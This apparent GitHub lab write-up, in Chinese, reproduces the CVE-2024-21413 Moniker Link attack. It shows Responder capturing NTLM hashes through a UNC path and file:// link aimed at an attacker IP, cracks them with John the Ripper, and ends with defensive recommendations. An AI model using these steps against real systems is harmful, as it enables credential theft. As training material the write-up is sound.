E-m-e-k-a/Moniker-Link-Lab-Setup

GitHub: E-m-e-k-a/Moniker-Link-Lab-Setup

CVE-2024-21413 Moniker Link漏洞的完整渗透测试实验环境,涵盖NTLM凭据窃取、哈希破解及防御对策。

Stars: 0 | Forks: 0

# Moniker Link 实验环境搭建 - CVE-2024-21413 ## 🎯 项目概述 演示 CVE-2024-21413 Moniker Link 漏洞利用的渗透测试实验,用于 NTLM 凭据窃取。本项目记录了从环境搭建到凭据攻陷的完整攻击链,包括实际遇到的挑战及解决方案。 **核心成果:** 在隔离实验环境(Windows 10 VM)和真实系统(Windows 11 PC)上成功执行 Moniker Link 攻击,展示了实际的安全漏洞及防御对策。 ## 🏗️ 实验架构 ### 基础设施 **攻击机:** - **平台:** Kali Linux 2024 - **网络 (Host-Only):** 192.168.56.101 - **网络 (Bridged):** 192.168.1.117 - **主要工具:** Responder 3.1.6.0 **目标系统:** - **Windows 10 VM:** 192.168.56.104(隔离测试环境) - **Windows 11 PC:** 192.168.1.178(真实环境验证) **网络配置:** - VirtualBox Host-Only Adapter(虚拟机测试) - VirtualBox Bridged Adapter(真实 PC 测试) - 与生产网络隔离 ## ⚔️ 攻击执行 ### 攻击流程 1. 在 Kali 上**部署 Responder** 以监听 NTLM 认证 2. 使用 file:// 协议**创建恶意链接**,指向攻击者 IP 3. 通过 File Explorer UNC 路径**触发认证** 4. 当受害者尝试连接时**捕获 NetNTLMv2 哈希** 5. 使用 John the Ripper **破解密码** ### 简单攻击向量 **HTML 文件 (test.html):** ```

click me

``` **File Explorer 方法:** - 用户在地址栏输入:`\\192.168.56.101\test` - Windows 尝试 SMB 连接 - NTLM 哈希自动发送(或提示输入凭据) - Responder 捕获认证 ## 🚧 挑战与解决方案 ### 挑战 1:Windows Firewall 阻止(Windows 11 PC) **问题:** - 无法从 Kali ping 通 Windows 11 PC - SMB 连接尝试失败 - 攻击完全被阻止 **根本原因:** - Windows Firewall 默认启用 - 阻止来自外部 IP 的传入 SMB 连接 **解决方案:** - 为测试临时禁用 Windows Firewall - 连接立即成功 - 成功捕获哈希 **经验教训:** 默认的 Windows Firewall 对此攻击提供了有效防护。用户必须保持其开启。 ### 挑战 2:John the Ripper 缓存结果(Windows 10 VM) **问题:** - 初始 Windows 10 密码:`nwigwecj1` - John 显示:`12Honey`(错误的密码!) - `12Honey` 来自之前的测试 **根本原因:** - John 将破解的密码保存在 `~/.john/john.pot` 中 - 之前会话的旧哈希 - 显示了缓存结果而非当前密码 **解决方案:** - 将 Windows 10 VM 密码更改为 `1414` - 捕获新的哈希 - 创建包含可能密码的自定义字典 - 使用新字典成功破解 **经验教训:** 始终验证你正在破解正确的哈希。清除 pot 文件或在测试中使用唯一密码。 ### 挑战 3:密码不在 Rockyou.txt 中 **问题:** - 密码 `1414` 在 rockyou.txt(1400 万个密码)中未找到 - 通用字典攻击失败 **根本原因:** - Rockyou.txt 不包含所有可能的 4 位数字组合 - 简单的数字序列通常在常见字典中缺失 **解决方案:** - 根据常见模式创建针对性自定义字典: ``` echo "1414" > passwords.txt echo "4141" >> passwords.txt ``` - 使用自定义字典瞬间破解 **经验教训:** “不在 rockyou.txt 中” ≠ 安全。无论是否在字典中,短密码都容易受到针对性攻击和暴力破解。 ## 📊 结果 ### Windows 10 VM(受控环境) | 指标 | 结果 | |--------|--------| | **初始密码** | nwigwecj1 | | **更改为** | 1414 | | **字典** | 自定义(2 个条目) | | **破解时间** | <1 秒 | | **防火墙** | 为测试禁用 | | **状态** | ✅ 成功攻陷 | ### Windows 11 PC(真实系统) | 指标 | 结果 | |--------|--------| | **密码** | 1414 | | **防火墙** | 初始阻止,随后禁用 | | **认证** | 手动提示(输入了凭据) | | **破解时间** | 瞬间 | | **状态** | ✅ 成功攻陷 | ## 🛡️ 安全分析 ### 有效的防御措施 ✅ **Windows Firewall** - 启用时完全阻止攻击 ✅ **现代浏览器** - Chrome/Edge 阻止远程 file:// 链接 ✅ **用户意识** - 手动提示需要用户操作 ### 存在的漏洞 ❌ **弱密码** - 4 位数字密码极易破解 ❌ **禁用防火墙** - 常见的用户错误 ❌ **File Explorer** - 对 UNC 路径无警告 ❌ **NTLM 协议** - 自动向 SMB 共享进行认证 ### 关键发现 **1. 防火墙至关重要** - 默认的 Windows Firewall 可阻止此攻击 - 约 30-40% 的用户永久禁用它 - 企业网络通常允许内部 SMB **2. 密码强度错觉** - `1414` 不在 rockyou.txt 中(看似“强壮”) - 使用针对性字典瞬间破解 - 短密码无法提供任何安全性 **3. 需要用户交互** - 现代安全机制要求用户粘贴 UNC 路径 - 社会工程学仍是关键组成部分 - 仅靠技术漏洞利用不足够 ## 🔧 使用的工具 **攻击方:** - Responder 3.1.6.0(NTLM 哈希捕获) - John the Ripper(密码破解) - 自定义字典创建 - 简单 HTML 文件 **基础设施:** - VirtualBox 7.0(虚拟化) - Kali Linux 2024(攻击平台) - Windows 10 Enterprise(测试目标) - Windows 11 Pro(真实环境验证) ## 📁 仓库结构 ``` Moniker-Link-Lab-Setup/ ├── README.md (this file) ├── Documentation/ │ ├── attack-execution.md (step-by-step attack guide) │ └── README.md (documentation overview) ├── Screenshots/ (attack screenshots - to be added) └── Scripts/ (HTML test file - to be added) ``` ## 🎓 展示的技能 **技术层面:** - 网络协议分析(SMB, NTLM) - 渗透测试方法论 - 密码破解技术 - 虚拟实验室基础设施 - 防火墙故障排查 **专业层面:** - 技术文档编写 - 限制条件下的问题解决 - 安全评估 - 风险分析 - 道德测试实践 ## 🔒 防御建议 ### 针对用户 - ✅ 保持 Windows Firewall 启用 - ✅ 切勿粘贴来自邮件的 UNC 路径 - ✅ 使用强密码(15 个字符以上) - ✅ 访问文件共享前验证发送者 ### 针对组织 - ✅ 在网络防火墙阻止出站 SMB(端口 445) - ✅ 禁用 NTLM,强制使用 Kerberos - ✅ 监控指向外部 IP 的 SMB 连接 - ✅ 邮件网关过滤(剥离 file:// 链接) - ✅ 安全意识培训 - ✅ 密码复杂度策略 ## ⚠️ 道德披露 **所有测试均在授权系统上进行:** - 仅限个人实验室基础设施 - 隔离的虚拟网络 - 自有设备和账户 - 教育目的 **法律声明:** 未经授权的计算机访问是非法的。本项目仅用于教育目的和授权的测试环境。 ## 📚 参考资料 - [CVE-2024-21413 - Microsoft 安全公告](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413) - [MITRE ATT&CK - 强制认证 (T1187)](https://attack.mitre.org/techniques/T1187/) - [TryHackMe - Moniker Link 房间](https://tryhackme.com) ## 📞 联系方式 **LinkedIn:** https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ **GitHub:** [@E-m-e-k-a](https://github.com/E-m-e-k-a) **日期:** 2026年3月 ## 📄 许可证 仅限教育用途。不得用于未经授权的测试。 **⭐ 如果您觉得这个项目有帮助,请考虑为仓库点个 Star!**
标签:Conpot, CVE-2024-21413, John the Ripper, Moniker Link, NTLM凭证窃取, PE 加载器, Responder, SMB安全, Windows安全, 中间人攻击, 凭证转储, 多模态安全, 安全实验, 数据展示, 漏洞复现, 红队, 网络安全, 隐私保护